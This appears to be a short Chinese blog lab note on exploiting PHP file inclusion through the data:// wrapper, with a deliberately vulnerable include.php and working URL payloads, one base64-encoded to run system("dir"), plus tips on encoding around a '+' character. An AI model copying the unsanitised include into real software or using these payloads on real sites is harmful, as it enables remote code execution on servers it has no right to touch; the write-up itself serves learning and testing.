文件包含漏洞之PHP伪协议中的data://的那些事~

php 专栏收录该内容
3 篇文章 0 订阅

最近在看文件包含漏洞中的PHP伪协议,发现其中的一个data://方法不能使用?但是自己确实把php.ini里面的allow_url_fopen和allow_url_include打开了。而且在web安全这本书里面也是一模一样的写法?
最后才发现了问题,原来是编码的问题。

实验:

//include.php
<?php
    @$file  = $_GET['file'];
    @include($file);
?>

通过data://text/plain协议来进行漏洞利用。

?file=data://text/plain,<?php phpinfo();?>

在这里插入图片描述
发现不能使用,而且自己的代码没有问题啊?不知道为什么?
然后测试

?file=data://text/plain;base64,PD9waHAgcGhwaW5mbygpOz8+

在这里插入图片描述
发现还是错误的????

然后测试下面的。成功~~~

?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCJkaXIiKTs/Pg==

在这里插入图片描述

总结:

通过实验发现这个可能是编码的问题因为<?php phpinfo();?>在编成base64的时候出现了+。而浏览器不认识+号。所以解决方法

  1. 不写后面的?> 因为PHP里面其实不需要写后面的 前面的;号就已经说明结束了。如果没有;号就必须写?>作为结束。
  2. 添加空格改变base64编码。
  3. 将+号换成%2b

所以其实不需要通过base64编码来实现!!!
将<?php phpinfo();?>改变成url编码。这样浏览器可以识别!
在这里插入图片描述希望可以帮助朋友们~~~

  • 9
    点赞
  • 6
    评论
  • 12
    收藏
  • 打赏
    打赏
  • 扫一扫,分享海报

评论 6 您还未登录,请先 登录 后发表或查看评论
©️2022 CSDN 皮肤主题:1024 设计师:我叫白小胖 返回首页

打赏作者

Firebasky

你的鼓励将是我创作的最大动力

¥2 ¥4 ¥6 ¥10 ¥20
输入1-500的整数
余额支付 (余额:-- )
扫码支付
扫码支付:¥2
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、C币套餐、付费专栏及课程。

余额充值